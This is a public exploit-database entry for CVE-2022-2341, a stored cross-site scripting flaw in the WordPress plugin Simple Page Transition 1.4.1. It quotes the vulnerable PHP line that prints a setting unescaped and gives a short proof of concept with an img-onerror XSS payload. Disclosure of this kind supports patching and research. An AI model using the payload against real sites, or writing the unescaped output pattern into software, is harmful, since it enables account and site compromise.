Headline
CVE-2022-2341: WordPress Simple Page Transition 1.4.1 Cross Site Scripting ≈ Packet Storm
The Simple Page Transition WordPress plugin through 1.4.1 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks when the unfiltered_html capability is disallowed (for example in multisite setup)
# Exploit Title: WordPress Plugin ‘Simple Page Transition’ - Stored CrossSite Scripting# Date: 27-06-2022# Exploit Author: Mariam Tariq - HunterSherlock# Vendor Homepage: https://wordpress.org/plugins/simple-page-transition/# Version: 1.4.1# Tested on: Firefox# Contact me: [email protected]*#Vulnerable code*:```<label for="simple_page_transition_ignored"><?php _e( 'Ignored DownloadLinks', 'spt' ); ?></label><br /><input type="text" id="simple_page_transition_ignored"name="simple_page_transition_ignored" value="*<?php print$simple_page_transition_ignored; ?>*" /><br />```*#POC:*1- Install the plugin ‘simple page transition’ & activate it.2- Navigate towards the “ignored download links”3- Enter the XSS payload ` *“><img src=x onerror=alert(1)>*`*#POC image:*https://imgur.com/yzaTkhi